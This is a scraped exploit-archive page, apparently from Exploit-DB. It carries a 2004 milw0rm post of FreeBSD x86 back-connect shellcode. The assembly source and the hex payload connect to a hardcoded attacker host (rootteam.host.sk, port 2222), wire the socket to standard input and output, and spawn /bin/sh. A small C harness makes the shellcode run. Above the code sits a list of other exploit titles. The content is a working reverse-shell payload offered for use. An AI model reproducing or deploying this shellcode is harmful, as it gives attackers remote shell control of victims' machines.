477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
72 lines
No EOL
1.7 KiB
C
Executable file
72 lines
No EOL
1.7 KiB
C
Executable file
/* the back-connect shellcode. The destination addr is
|
|
0x28402ec3 (rootteam.host.sk) port is 0x8ae (2222).
|
|
size = 93 bytes (little isn't it?)
|
|
Greetz 2 sp00fed
|
|
written by dev0id #rus-sec /EFnet (rootteam.host.sk)
|
|
|
|
BITS 32
|
|
|
|
jmp short path
|
|
main:
|
|
pop esi
|
|
xor eax,eax
|
|
mov byte [esi+1],0x02 ; filling the sock_addr struct
|
|
mov word [esi+2],0x08ae
|
|
mov long [esi+4],0x28402ec3 ;(here your addr: rootteam.host.sk)
|
|
push byte 0x06 ;int socket(int domain,int type, int proto)
|
|
push byte 0x01
|
|
push byte 0x02
|
|
mov al,97 ;/usr/include/sys/syscall.h (socket)
|
|
push eax
|
|
int 0x80
|
|
mov edx,eax ;now in edx we have the descriptor
|
|
push byte 0x10 ;making connect
|
|
lea eax,[esi]
|
|
push eax
|
|
push edx ;eax is our socket descriptor
|
|
xor eax,eax
|
|
mov al,98 ;/usr/include/sys/syscall.h (connect)
|
|
push eax
|
|
int 0x80
|
|
mov cl,3
|
|
mov ebx,-1
|
|
loop_1: ;making dup2 3 times
|
|
inc ebx
|
|
push ebx
|
|
push edx
|
|
mov al,90
|
|
push eax
|
|
int 0x80
|
|
loopnz loop_1
|
|
xor eax,eax
|
|
push eax
|
|
push long 0x68732f2f
|
|
push long 0x6e69622f
|
|
mov edx,esp
|
|
push eax
|
|
push esp
|
|
push edx
|
|
mov al,59 ;/usr/include/sys/syscall.h(execve)
|
|
push eax
|
|
int 0x80
|
|
path:
|
|
call main
|
|
db 'A'
|
|
*/
|
|
char shellcode[] =
|
|
"\xeb\x56\x5e\x31\xc0\xc6\x46\x01\x02\x66\xc7\x46\x02\xae\x08"
|
|
"\xc7\x46\x04\xc3\x2e\x40\x28\x6a\x06\x6a\x01\x6a\x02\xb0\x61"
|
|
"\x50\xcd\x80\x89\xc2\x6a\x10\x8d\x06\x50\x52\x31\xc0\xb0\x62"
|
|
"\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff\xff\x43\x53\x52\xb0\x5a"
|
|
"\x50\xcd\x80\xe0\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
|
|
"\x62\x69\x6e\x89\xe2\x50\x54\x52\xb0\x3b\x50\xcd\x80\xe8\xa5"
|
|
"\xff\xff\xff\x41";
|
|
int
|
|
main()
|
|
{
|
|
int *ret;
|
|
ret=(int*)&ret+2;
|
|
(*ret)=(int)shellcode;
|
|
}
|
|
|
|
// milw0rm.com [2004-09-26]
|